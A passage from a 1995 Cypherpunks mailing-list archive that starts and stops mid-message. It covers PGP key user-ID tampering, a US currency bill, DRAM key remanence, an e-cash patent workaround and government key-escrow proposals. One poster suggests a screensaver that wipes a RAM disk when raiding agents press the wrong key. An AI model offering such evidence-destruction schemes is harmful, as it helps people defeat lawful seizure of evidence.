signatures } on other people's public keys. Then using Chaumian credential technology } it would be possible to anonymously transfer these credentials from one } pseudonym to another. /.../ } I certainly appreciate these kinds of comments, but it would be even } more useful if such messages were expressed as the kinds of } certificates I am describing. I wonder whether people would be willing } to use a program which would let them issue such "reputation } signatures" of various kinds, and display the signatures which were } present on keys. /.../ } I could see such a system initially being piggybacked on PGP keys (the } signatures would not be understandable by PGP though), although for } Chaumian credential transfers the keys have to be specially structured } and that would require a new approach. When the list was discussing "key as final authority" a while back, Wei Dai posted (on May 31) a program called 'addid' which allows one to add arbitrary strings as user IDs on other peoples' pgp keys. These appear just as though PGP had added them itself, and are signable and displayable by regular old PGP. As an exercise, I grabbed Hal's "insecure key" from the keyserver, and used 'addid' to add a new ID to it, which I then signed. Here's the output of 'pgp -kc 0xcbd301': Key ring: 'pubring.pgp', looking for user ID "0xcbd301". Type bits/keyID Date User ID pub 512/4ECBD301 1994/11/29 Hal writes good posts -- Read them all sig! 2C48CAE9 1995/09/04 Lou Poppler Hal Finney insecure key sig! 58214C37 1994/12/01 Hal Finney <74076.1041 at compuserve.com> (If anyone cares) here is Hal's key cbd301, as summarized above: - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQBNAy7bVn8AAAECAPRhqHLha5WFaFQw0/b1Wn8XCuHokjvbEeJbg5UPHs6fBE3i uZTmAY5aFqnFXOdNGackOOTYu3tEGcwsm07L0wEABRG0JkhhbCB3cml0ZXMgZ29v ZCBwb3N0cyAtLSBSZWFkIHRoZW0gYWxsiQCVAwUQMEtYRWpfQFwsSMrpAQFG4gQA gH38LFuPGKo/bP2paTNWdpid9Gq8+xF3/K35I3fj+mgDsRDoGQGiJOzpksqAOYy5 PRKW9lC9vB1kPGoit7L4kjptsVB6MtBJeLnMYDF77CZUj/Sjvcjapbn0pNgFVHd5 AQjD8JJilL9nzjc6C77XUcDMAqoBFDmOsDU0+epzv/m0F0hhbCBGaW5uZXkgaW5z ZWN1cmUga2V5iQCVAwUQLt5K9agTA69YIUw3AQED0gQAoORH1weDQ+L2gefrRauI GLqDlNy0nJQDo5wgdJky5Pd7vUJalwxGuqnQG1QV+ejnRYEN7wEoYQRjv21tTos9 nbUtWAoINrEVjWHpG7AXIRNyoCJtket9mQ2jz9QNTD9Nt8JsedJlqLuT7RMLN1tb /cIYnrBCyuTCek4fRbTYkSU= =xEr2 - -----END PGP PUBLIC KEY BLOCK----- here is my key 48cae9, which signs the above new ID (and this mail): - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAiyLuS0AAAEEALvPIvz5q0PzIEvuAmyIXPz89jG8jB5tcRl5itVNVhvqTL9/ Z+dlfBHvzL5d7FpTj3qPxe7tDFsH/MB1JJV/DhhLSAzvoyg8cEDkFJhwPihrytGK xgTgdO3NYL0Pq5o6Kk86LqVpRO8LamKM9sJgQGn6q9t+vbtHdGpfQFwsSMrpAAUR tB9Mb3UgUG9wcGxlciA8bHdwQG1haWwubXNlbi5jb20+iQCVAwUQL+6zzGpfQFws SMrpAQHAMwQAuzbPEV2JP6nUKKP8v1qRAQELvz4GfH++B6XwzxTmiz65kkfC/uOz LB9MIe/VNrulriTUGI3U0FjfuaSvJLQq92t434NK9/SXAfK6iemq9Bz7Pb8/iuB7 VfMTR8+Yvda8zScX6Rms49zmyOf8vC1n+4C0kJsKSlw+gy8GuaxSLZ6JAJUDBRAv vAPCG46b4I3URvEBAZwfBACNXe36MeaLcJIVvSQz4/1Iz7Iqy8ukS2xoG7fJGPvx DHjDYMn2xFtGF16IRKN8UuIpldfY1fFU5CI9vLCEqd5katbRrnZjcpF2Vp0QC3nP egpDlXYUOe9kwSjIOdUIlCQn0lTIxqGSzT8hCKxn8i0HD1hSa2NtREptf8pUH3Ln Ig== =w+eq - -----END PGP PUBLIC KEY BLOCK----- :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :: Lou Poppler | Doom an evil deed, :: :: http://www.msen.com/~lwp/ | liven a mood. :: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMEtoa2pfQFwsSMrpAQGDAwQAjrdHWqJSsI5WB9exvJZf21mVZwCjaGuH XlK/e0+i6p3Zf8YYyY3EFP/gwL4191PhB2AG2gD77tI0ijG7GI8gD0nZQc3ZwH/C N+zfgH9OOOVxu5CUKcuSBC8AgIu7RYdKb3WFqA+5QczjaWjKiz5XuviJoUg1QLGD TemyBujRxhE= =RYHl -----END PGP SIGNATURE----- From johnl at radix.net Mon Sep 4 14:12:34 1995 From: johnl at radix.net (John A. Limpert) Date: Mon, 4 Sep 95 14:12:34 PDT Subject: e$: More fun with cash: Senate Bill 307 Message-ID: <199509042110.RAA22377@saltmine.radix.net> At 01:41 PM 9/4/95 -0400, Robert Hettinga wrote: >Has anyone heard about this bill? Comments? This idea seems to get proposed every few years. In the past it has been shelved as soon as someone figures out the disaster that would be caused by the resultant decline in the value of the dollar. The U.S. Government has to be nice to foreigners that hold large quantities of dollars and treasury securities, even if it doesn't care about the political consequences at home. -- John A. Limpert johnl at Radix.Net From unicorn at access.digex.net Mon Sep 4 14:14:41 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Mon, 4 Sep 95 14:14:41 PDT Subject: e$: More fun with cash: Senate Bill 307 In-Reply-To: Message-ID: On Mon, 4 Sep 1995, Sandy Sandfort wrote: > Date: Mon, 4 Sep 1995 11:35:20 -0700 (PDT) > From: Sandy Sandfort > To: Robert Hettinga > Cc: cypherpunks at toad.com > Subject: Re: e$: More fun with cash: Senate Bill 307 > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > SANDY SANDFORT > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > > C'punks, > > On Mon, 4 Sep 1995, Robert Hettinga wrote: > > > Has anyone heard about this bill? Comments? > > > >(c) Currency Exchange-- > > > (1) Plan--Not later than 12 months after the date of enactment of this > > >section, the Secretary shall devedlop and begin implementation of a plan to > > >require the exchange of all existing $100 denomination United States currency > > >held within and outside of the United States for $100 denomination domestic > > >use and nondomestic use United States currency issued in accordance with this > > >sectin. > > . . . > > > > (1) domestic use currency, issued in accordance with this section shall > > >be recognized as constituting a negotiable claim against the United States > > >Treasury only when presented within the United States, and shall constitute > > >legal tender for any debts, public or private, only when presented in the > > >United States, . . . > > > > (2) nondomestic use currency shall be recognized as constituting a > > >negotiable claim against the United States Treasure, and legal tender > > >for any debts, public or private, only when presented outside of the > > >United States, . . . > > It's obvious that this bill has very little to do with large-scale > money laundering, narcotrafficking nor terrorism. All those folks > will simply use "domestic use currency" inside or outside of the > United States. At worst, it will cause them a one-time problem. > > Then at whom is the bill really aimed? Average, middle-class > Americans, is my guess. Fortunately, it doesn't look too tough > to get around. If you have a matress full of C-notes, I suggest > you start using them to buy travelers checks--including a few > denominated in strong foreign currencies. Actually it was aimed at the rumors that Iran had been printing U.S. currency on a large scale and using it abroad. When I say Iran, I mean a government backed program. New York Times had an article on the matter last year. With enough interest I will try to Lexis/Nexus it. While there was some evidence that Iran had indeed been forging notes, the extent was unclear/minimal. Of course, with this kind of rumor there is the issue of confidence in the currency as well as actual threat. The first response was the inset of the polyester and foil thread in the bills (and NO they can't detect quantity as you go through airport sensors, and don't ask me again). The foreign traveller will notice the serious scrutiny all U.S. bills abroad will receive, particular attention paid to the presence of the strip. Many foreign shops will not take U.S. bills which are older and have no strip as a result. This new plan, which is total lunacy of course, and which I expect to fail, but the real zap is on anyone with a spare million in counterfeit or undeclared currency. I might add, try being a tourist in Estonia and presenting U.S. bills that are no good in the U.S. You'll be about as popular as someone in the Midwest with Canadian bills. > > S a n d y > --- 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From johnl at radix.net Mon Sep 4 14:21:11 1995 From: johnl at radix.net (John A. Limpert) Date: Mon, 4 Sep 95 14:21:11 PDT Subject: The Dangers of Caribbean Data Havens Message-ID: <199509042119.RAA22672@saltmine.radix.net> At 10:19 AM 9/4/95 -0700, Timothy C. May wrote: >"Outages" lasting days or weeks after these islands get torn up every few >years will not go too well with international commerce. I thought there were a number of bank and credit card data entry centers that had already moved to the Carribean. They may not care if the local phone service gets wiped out for several weeks if they have a hardened line to the nearest Cable & Wireless earth station. -- John A. Limpert johnl at Radix.Net From unicorn at access.digex.net Mon Sep 4 14:36:54 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Mon, 4 Sep 95 14:36:54 PDT Subject: Emergency File Wipe Algorithim In-Reply-To: <199509041725.TAA12314@utopia.hacktic.nl> Message-ID: On Mon, 4 Sep 1995, Anonymous wrote: > Date: Mon, 4 Sep 1995 19:25:07 +0200 > From: Anonymous > To: mail2news at utopia.hacktic.nl, cypherpunks at toad.com > Newgroups: alt.security.pgp, alt.politics.org.fbi > Subject: Re: Emergency File Wipe Algorithim > > When a running computer is seized in some sort of law enforcement > raid, what are the chances someone would think to backup the > contents of a RAMDISK drive prior to powering it down? > > Why would you even ask this question? If the odds are > 0 (which they are) they are too high as the solution is simple. A screensaver which shuts down the system entirely if anything but "}" is pressed. If any key but the secret one is pressed by an excited agent, the ramdisk is gone. If the computer is simply powered down, the ramdisk is gone. I suggest, rather than a ramdisk however, an encrypted partition al la CryptDisk or Secure(Drive? Device?). --- 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From MAILER-DAEMON at access.digex.net Mon Sep 4 14:40:09 1995 From: MAILER-DAEMON at access.digex.net (Mail Delivery Subsystem) Date: Mon, 4 Sep 95 14:40:09 PDT Subject: Returned mail: User unknown Message-ID: <199509042136.RAA18457@access2.digex.net> The original message was received at Mon, 4 Sep 1995 17:35:13 -0400 from unicorn at localhost ----- The following addresses had delivery problems ----- Anonymous (unrecoverable error) ----- Transcript of session follows ----- ... while talking to utopia.hacktic.nl.: >>> RCPT To: <<< 550 ... User unknown 550 Anonymous ... User unknown 451 cypherpunks at toad.com... reply: read error from toad.com. ----- Original message follows ----- To: Anonymous Subject: Re: Emergency File Wipe Algorithim From: Black Unicorn Date: Mon, 4 Sep 1995 17:35:07 -0400 (EDT) cc: mail2news at utopia.hacktic.nl, cypherpunks at toad.com In-Reply-To: <199509041725.TAA12314 at utopia.hacktic.nl> On Mon, 4 Sep 1995, Anonymous wrote: > Date: Mon, 4 Sep 1995 19:25:07 +0200 > From: Anonymous > To: mail2news at utopia.hacktic.nl, cypherpunks at toad.com > Newgroups: alt.security.pgp, alt.politics.org.fbi > Subject: Re: Emergency File Wipe Algorithim > > When a running computer is seized in some sort of law enforcement > raid, what are the chances someone would think to backup the > contents of a RAMDISK drive prior to powering it down? > > Why would you even ask this question? If the odds are > 0 (which they are) they are too high as the solution is simple. A screensaver which shuts down the system entirely if anything but "}" is pressed. If any key but the secret one is pressed by an excited agent, the ramdisk is gone. If the computer is simply powered down, the ramdisk is gone. I suggest, rather than a ramdisk however, an encrypted partition al la CryptDisk or Secure(Drive? Device?). --- 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From joelm at eskimo.com Mon Sep 4 14:59:35 1995 From: joelm at eskimo.com (Joel McNamara) Date: Mon, 4 Sep 95 14:59:35 PDT Subject: Seattle area Cypherpunks Message-ID: <199509042159.OAA15140@mail.eskimo.com> With the Labor Day weekend/vacation season almost over and a variety of projects completed, I'm going to attempt to jump-start Cypherpunk activities in the Seattle area (the Seattle Cypherpunks sub-list appears to have withered away, so delete this if you're outside the Pacific Northwest). The first order of business is to get an idea of how many people would be interested in meeting some evening, likely toward the end of September. Send me e-mail (please don't reply to the list) with a time and geographic preference as to location. I'm on the Eastside, so will be slightly biased in finding an appropriate meeting place in the Bellevue/Redmond area, unless persuaded otherwise. Also, let me know if you're interested in discussing (or presenting) any specific crypto/privacy/ecash-related topics in a very informal setting. Aside from key signing and general face-to-face networking, I would like to have a few set items on the agenda. Any suggestions welcomed. Based on your responses, I'll do all of the running around and organizational type activities, and follow-up with e-mail and a general announcement to the main list when arrangements are finalized. This is an opportunity to get away from your keyboards and meet other folks who share your interests. Hope to see you later this month. Joel McNamara joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP key Thomas Jefferson used strong crypto, shouldn't you? From cwe at Csli.Stanford.EDU Mon Sep 4 15:17:31 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Mon, 4 Sep 95 15:17:31 PDT Subject: Emergency File Wipe Algorithim In-Reply-To: Message-ID: <199509042217.PAA17498@Csli.Stanford.EDU> Anon writes> > When a running computer is seized in some sort of law enforcement > raid, what are the chances someone would think to backup the > contents of a RAMDISK drive prior to powering it down? Also note the recent posting on sci.crypt by Peter Gutmann about being able to recover data from DRAMs and SRAMs after powerdown. It hits cryptokeys really bad. I suppose this is really academic at the current stage, but that might change. /Christian From liberty at gate.net Mon Sep 4 15:25:40 1995 From: liberty at gate.net (Jim Ray) Date: Mon, 4 Sep 95 15:25:40 PDT Subject: e$: More fun with cash: Senate Bill 307 Message-ID: <199509042224.SAA05533@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Black Unicorn wrote: > >Actually it was aimed at the rumors that Iran had been printing U.S. >currency on a large scale and using it abroad. When I say Iran, I mean >a government backed program. New York Times had an article on the matter >last year. With enough interest I will try to Lexis/Nexus it. I had heard that it was the Columbians, branching out from the cocaine business with those fancy new copy machines, which are supposed to be able to duplicate the blue & red threads in US currency paper. JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMEt7vW1lp8bpvW01AQGnwwQAmPz1SagLoKpAmfUvwyI8GVq8wSOaFH96 vTarz6PxnuNPHhITIAzPeq8EX5N8MexRfHtMbmK0JOxA5L+B+QHP1rTM8mqUbAJh Gg4ZMC9Jzvhq+JENaP8ZG03+pvm1nnZIr8WarY5DJ8FYNMLvDrSUhhWFu7OSo2a+ fS0NKxpm5Ps= =HXa+ -----END PGP SIGNATURE----- Regards, Jim Ray See, when the GOVERNMENT spends money, it creates jobs; whereas when the money is left in the hands of TAXPAYERS, God only knows what they do with it. Bake it into pies, probably. Anything to avoid creating jobs. -- Dave Barry ------------------------------------------------------------------------ PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James M. Ray ------------------------------------------------------------------------ Support Phil! email zldf at clark.net or see http://www.netresponse.com/zldf ________________________________________________________________________ From thad at hammerhead.com Mon Sep 4 15:43:30 1995 From: thad at hammerhead.com (Thaddeus J. Beier) Date: Mon, 4 Sep 95 15:43:30 PDT Subject: Encrypted desktop videoconferencing Message-ID: <199509042240.PAA01994@hammerhead.com> A friend of mine works for a large input-device company, and they are looking to get into the desktop videoconferencing business. Their current business is extremely competitive on price, and they'd like to do something in desktop videoconferencing that would distinguish them from everybody else. Naturally, I suggested cryptography. I have always thought that the biggest problem introducing crypto to phone conversations was the large amount of cpu speed and software complexity to digitize the audio; that adding the crypto code is relatively minor. Certainly RC4 and IDEA for instance, run very fast. In videoconferencing applications, this audio compression is already being done, so adding the crypto should be almost free. Well, except for licensing costs. I'd really like to use Diffie-Hellman to negotiate a key. Does anyone know how much it would cost to license that from PKP? I'd expect that there would be a one time fee, plus a per-copy-sold fee. Does anybody know - and if so, can they say - if anybody else has added or is adding cryptography to their videoconferencing systems? It seems like such a killer ap that I must be overlooking something. thad -- Thaddeus Beier email: thad at hammerhead.com Technology Development vox: 408) 286-3376 Hammerhead Productions fax: 408) 292-8624 From unicorn at access.digex.net Mon Sep 4 15:48:00 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Mon, 4 Sep 95 15:48:00 PDT Subject: e$: More fun with cash: Senate Bill 307 In-Reply-To: <199509042224.SAA05533@tequesta.gate.net> Message-ID: On Mon, 4 Sep 1995, Jim Ray wrote: > Date: Mon, 04 Sep 1995 18:22:43 -0400 > From: Jim Ray > To: cypherpunks at toad.com > Subject: Re: e$: More fun with cash: Senate Bill 307 > > -----BEGIN PGP SIGNED MESSAGE----- > > Black Unicorn wrote: > > > > > >Actually it was aimed at the rumors that Iran had been printing U.S. > >currency on a large scale and using it abroad. When I say Iran, I mean > >a government backed program. New York Times had an article on the matter > >last year. With enough interest I will try to Lexis/Nexus it. > > I had heard that it was the Columbians, branching out from the cocaine > business with those fancy new copy machines, which are supposed to be > able to duplicate the blue & red threads in US currency paper. > JMR I've not heard anything about this. Any sources? > > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > Comment: Freedom isn't Freeh > > iQCVAwUBMEt7vW1lp8bpvW01AQGnwwQAmPz1SagLoKpAmfUvwyI8GVq8wSOaFH96 > vTarz6PxnuNPHhITIAzPeq8EX5N8MexRfHtMbmK0JOxA5L+B+QHP1rTM8mqUbAJh > Gg4ZMC9Jzvhq+JENaP8ZG03+pvm1nnZIr8WarY5DJ8FYNMLvDrSUhhWFu7OSo2a+ > fS0NKxpm5Ps= > =HXa+ > -----END PGP SIGNATURE----- > Regards, Jim Ray > > See, when the GOVERNMENT spends money, it creates jobs; whereas > when the money is left in the hands of TAXPAYERS, God only knows > what they do with it. Bake it into pies, probably. Anything to > avoid creating jobs. -- Dave Barry > ------------------------------------------------------------------------ > PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 > Key id. # E9BD6D35 James M. Ray > ------------------------------------------------------------------------ > Support Phil! email zldf at clark.net or see http://www.netresponse.com/zldf > ________________________________________________________________________ > > 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From rrothenb at ic.sunysb.edu Mon Sep 4 15:50:01 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Mon, 4 Sep 95 15:50:01 PDT Subject: pseudonyms & list health In-Reply-To: Message-ID: <199509042248.SAA08649@csws5.ic.sunysb.edu> Tim wrote: > At 6:13 AM 9/4/95, Futplex wrote: > >Deranged Mutant writes: > >> My worry is about abuse. One would prefer to save endorsements and find > >> a way to remove thumbs-downs... also how to prevent one from overdoing a > >> thumbs-up or -down certification for a person (either to inflate or de- > >> flate a reputation). > > > >A few nuisance lawsuits from people who were given thumbs-downs might do the > >trick, as with employment recommendations in the U.S. :[ > > A good point that deserves further comment. Employers have taken to _saying > nothing_ about past employees, for fear of lawsuits by disgruntled job > seekers. So much for free speech, courtesy of the American legal system. As a somehow related note, my experience with some past jobs is that in some circumstances the employee turnover rate is high enough that a manager will give a neutral or good rating simply because they have no experience with a previous employee who clearly did not deserve a good rating. Something similar could happen with mailing lists... hardly anyone can remember when a 'newbie' posted to a list a few years ago, irregardless of whether a person is still worth a certain rating after a time. Then again, with a lot of material being archived, it might be easier in some circumstances to review a person's contributions to a list rather than rely on a rating... or maybe send a trusted rater to research an author on the 'net for you rather than maintain a huge database of ratings that will need some form of interpretation. Then again, (as Tim and others noted) there's alws killfiles and manual glossing over of threads, etc. > But as we can't changed the litigious nature of American society (and maybe > European society--I don't know), the emphasis ought to be on digital > systems and reputations by pseudonyms. Litigating in a society of pseudonyms may have it's own problems anyway... (imagining suing a trusted friend of yours who prefers to give you much needed crticisms through a pseudonym so as to protect the friendship... on example off the top of my head)... How can a 'nym be held legally accountable as a non-'nym? -Rob From hallam at w3.org Mon Sep 4 16:11:55 1995 From: hallam at w3.org (hallam at w3.org) Date: Mon, 4 Sep 95 16:11:55 PDT Subject: Emergency File Wipe Algorithim In-Reply-To: <199509042217.PAA17498@Csli.Stanford.EDU> Message-ID: <9509042310.AA27080@zorch.w3.org> >Also note the recent posting on sci.crypt by Peter Gutmann about being >able to recover data from DRAMs and SRAMs after powerdown. It hits >cryptokeys really bad. If the power is cycled as opposed to turned off only then a memory self test program will probably erase the data. Phill From cwe at Csli.Stanford.EDU Mon Sep 4 16:14:32 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Mon, 4 Sep 95 16:14:32 PDT Subject: Emergency File Wipe Algorithim In-Reply-To: Message-ID: <199509042314.QAA18360@Csli.Stanford.EDU> Someone proposed that one could wipe the memory before power-down, for example during 1 second or something like that. Unfortunately, that wont help, unless I misread the paper. It is effectively the same as if the key had been stored in the cell for 1 second less, nothing else. The only way I can see how to avoid generating "imprints" of more or less static data is to make them non-static. Start circulating them around. One way that springs to mind for keys are to do something like inverting the meaning of the key every x milliseconds. Like this; /* pseudo code */ char master_key[KEYSIZE]; int meaning = ZEROS; void encryption(char *input, char *output); /* implicit master_key */ int using_key = FALSE; main() { input_from_keyboard(master_key); timer(100 ms, flipem()); /* calls flipem every 20 ms */ main_loop(); /* occansionally using encryption() */ } void flipem() { if (using_key) /* risk of never being able to flipem() */ return; /* some kind of semaphored section */ using_key = TRUE; master_key = inverse(master_key); meaning = (!meaning); using_key = FALSE; } void encryption(char *input, char *output) { char real_key[KEYSIZE]; /* must be on stack */ copy_key(real_key, master_key); if (meaning == ONES) invert(real_key); /* recovering real content */ encrypt(input, output, real_key); write_random_key(real_key); /* so "real" key doesn't become imprinted as well. */ } Do don't care about the plaintext in the above. Nor stack content vrey much. Nor about coding style. From liberty at gate.net Mon Sep 4 16:25:30 1995 From: liberty at gate.net (Jim Ray) Date: Mon, 4 Sep 95 16:25:30 PDT Subject: e$: More fun with cash: Senate Bill 307 Message-ID: <199509042324.TAA65697@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Black Unicorn wrote: >> >> >> > [I said] >> >> I had heard that it was the Columbians, branching out from the cocaine >> business with those fancy new copy machines, which are supposed to be >> able to duplicate the blue & red threads in US currency paper. >> JMR > >I've not heard anything about this. Any sources? Sorry, just my vague memory of a Miami Herald article from a while back. Perhaps someone else on the list is more familiar with good copy-machines. Around here, the Columbian cartels are depicted as very, powerful, with easy payoffs to the highest levels of their country's political and judicial systems, and access to technology such as Motorola's encrypted walkie-talkie (supposedly a restricted-sale item). Of course, US politicians are completely immune to bribes from drug cartels. JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMEuHYG1lp8bpvW01AQFTFwP+NhvKkGzuoXVOkd8oKWxFwQm4LvG+DL08 L6i/oXJVq2+AMApc12TS4VT7AS5UKfPp7Gu2pLKt6/G4m6KqLeN8vi31+ssOEBZs PJhCV/GdXBwXCvHM+oklQI4Tref5zzs0Wu+ai2pE3tCt+sVL4t9SeFexhexbjwn3 H6cnT/g79Qs= =NP8N -----END PGP SIGNATURE----- Regards, Jim Ray See, when the GOVERNMENT spends money, it creates jobs; whereas when the money is left in the hands of TAXPAYERS, God only knows what they do with it. Bake it into pies, probably. Anything to avoid creating jobs. -- Dave Barry ------------------------------------------------------------------------ PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James M. Ray ------------------------------------------------------------------------ Support Phil! email zldf at clark.net or see http://www.netresponse.com/zldf ________________________________________________________________________ From bplib at nic.wat.hookup.net Mon Sep 4 16:27:48 1995 From: bplib at nic.wat.hookup.net (bplib at nic.wat.hookup.net) Date: Mon, 4 Sep 95 16:27:48 PDT Subject: VCRPLUS Huffman code Message-ID: <199509042328.TAA02676@nic.wat.hookup.net> I too would be interested in the VCRPlus code. Has anyone broken it? Tim Philp From cwe at Csli.Stanford.EDU Mon Sep 4 16:38:57 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Mon, 4 Sep 95 16:38:57 PDT Subject: Emergency File Wipe Algorithim In-Reply-To: <199509042314.QAA18360@Csli.Stanford.EDU> Message-ID: <199509042338.QAA18782@Csli.Stanford.EDU> FYI. Repost from sci.crypt. It seems as it has expired at some places. /Christian From cman at communities.com Mon Sep 4 16:45:35 1995 From: cman at communities.com (Douglas Barnes) Date: Mon, 4 Sep 95 16:45:35 PDT Subject: Identity Agnostic Online Cash Message-ID: An early draft of a paper based on my comments at the Crypto '95 rump session is available at: http://www.communities.com/paper/agnostic.html Here's the abstract: Abstract: One of the unique aspects of Chaum's blind signature scheme for anonymous transactions is that it is practiced entirely by the side that wants to be anonymous. In a customer-bank relationship, the customer's software practices the technology, not the bank's. Chaum's patent on blind signatures cites as prior art a non-anonymous signature scheme that differs significantly only in steps taken by the "customer" side. An open standard for electronic cash would then allow a bank or other cash issuer to remain agnostic with respect to customer's software blinding or not blinding. Since the bank's software would be practicing technology cited as prior art by Chaum in his patent, and would have a substantial non-infringing use, I argue that the bank would not need to license Chaum's patents, provided the bank itself only provided non-blinding customer software. Here's a review of the talk by Hal Finney... :-) One of the more interesting talks I thought was from cypherpunk Doug Barnes, on "identity agnostic" electronic cash. This is basically an idea for creating a Magic-Money-type electronic cash server without violating Chaum's cash patent. What you do is to run the server and publish a spec it will follow. All the server does is do an RSA signature on the raw data it receives and decrement the user's account accordingly. The user has a choice of doing blinding or not on the signature. Chaum's patent covers the blinding, so if the user wants to do that he should be sure to license the patent or live somewhere it doesn't apply (or ignore it if he figures he's too small potatoes for them to care about). But the server isn't responsible for checking all this. It just does RSA sigs, which is prior art as far as Chaum's patent goes. Users can blind or not, it doesn't care. It is "identity agnostic" as Doug says. The implication is that with an RSA license you could run this kind of bank (online cash) and ignore Chaum's patents, while a horde of end users violate the patents but take safety in numbers and get anonymity. Lawyers like to go after big targets but the servers aren't violating anything. From hallam at w3.org Mon Sep 4 16:48:00 1995 From: hallam at w3.org (hallam at w3.org) Date: Mon, 4 Sep 95 16:48:00 PDT Subject: VCRPLUS Huffman code In-Reply-To: <199509042328.TAA02676@nic.wat.hookup.net> Message-ID: <9509042347.AA27160@zorch.w3.org> >I too would be interested in the VCRPlus code. Has anyone broken it? Challenge time ! C'mon - can do this by exhaustive search probably :-) There is a lot of stuff in the satelite tv newsgroups on this topic. I think its an item well worth cracking. Phill From sdw at lig.net Mon Sep 4 17:08:23 1995 From: sdw at lig.net (Stephen D. Williams) Date: Mon, 4 Sep 95 17:08:23 PDT Subject: VCRPLUS Huffman code In-Reply-To: <199509042328.TAA02676@nic.wat.hookup.net> Message-ID: It was broken, and I might have the reference in my archives... If I get time I'll find it. > I too would be interested in the VCRPlus code. Has anyone broken it? > Tim Philp > > -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From stewarts at ix.netcom.com Mon Sep 4 17:23:23 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 4 Sep 95 17:23:23 PDT Subject: Acceptable NIS&T restrictions Message-ID: <199509050019.RAA27055@ix9.ix.netcom.com> At 12:54 PM 9/4/95 -0400, Pat Farrell commented on the NIST's latest proposals for their September meeting on export controls and software with built-in government access to keys (GAK). I'll generally use the terms GAK or master keying rather than escrow, since escrow is a legal term that implies both the willingness of both parties to use it, and also that the escrowed material be delivered only when certain criteria are satisfied, which is out of the scope of almost any proposals I've seen labelling themselves "key escrow", particularly the Clipper system. Material with > and indentation are from the NIST paper; material with just > and 0-1 spaces is Pat's. 64 bits of keyspace is of course hopelessly inadequate for financial transactions - crackerboxes have been designed that allow very rapid breaking of single-DES or short-key RC4, and a useful platform needs to accommodate high-value transactions such as customers access to stockbrokers as well as more limited-value transactions such as credit cards where a $1000 cracking cost makes crime not pay well. The Administration argues that the limitation makes up for the possibility that users may find ways to evade GAK; but users can already do that now. > "Avoiding multiple encryption -- How can the product be > designed so as to prevent doubling (or tripling, etc.) the > key space of the algorithm?" >CME has been suggesting DES | TRAN | DES | TRAN | DES >for years. Can they really _avoid_ (i.e. prevent) this? (CME is Carl Ellison at TIS; tran is a simple transposition system.) Sure - if the software always tacks in master keys any time it does a symmetric-key encryption, and won't/can't decrypt without it, then DES+GAK | DES+GAK | DES+GAK is just as vulnerable to someone with the master key as single DES+GAK - it just takes three separate phases of key forfeiture to decode. (yes, I left out the tran phase; anybody going to that much work is using something other than the built-in encryption, at which point they might as well use non-government-approved encryption themselves.) Does it triple the key space? For people without the master key, yes, though maybe they get some known plaintext. For people with the master key, it depends on your definitions, and maybe _they_ put in some known plaintext that they don't give outsiders, but it probably doesn't lose them much. > "Disabling the key escrow mechanism -- How can products be > made resistant to alteration that would disable or > circumvent the key escrow mechanism? How can the "static > patch" problem be avoided? How can this be tested?" > >This is easy in hardware. Is it even possible in software? Probably. Consider the sort of master-key system where part of the session key isn't transmitted - maybe you do something like hash the user portion of the session key with the hash of the program and feed it to the KeyMaster's public key to get the session key. By the time you put all of that into Pretty Good PatchAround, you might as well just use PGP. > "Practical Key Access -- How can mechanisms be designed so > that repeated involvement of escrow agents is not required > for decryption for multiple files/messages during the > specified access period?" >At least this has a chance of being real. We need to have a suggestion >for expiration times for the escrowed keys. This was a huge problem with the >initial Clipper. Information can't be destroyed, only forgotten, so time-limitation is tough. What you can do is limit the scope of messages that can be decrypted by one trip to the keymaster - the Feds are looking for some mechanism so that any limits like this won't require multiple trips for one bunch of wiretapping. >Is there a reasonable middle ground between long term keys such >as PGP uses, and the ephemeral keys of a D-H exchange? What's reasonable? Some potential 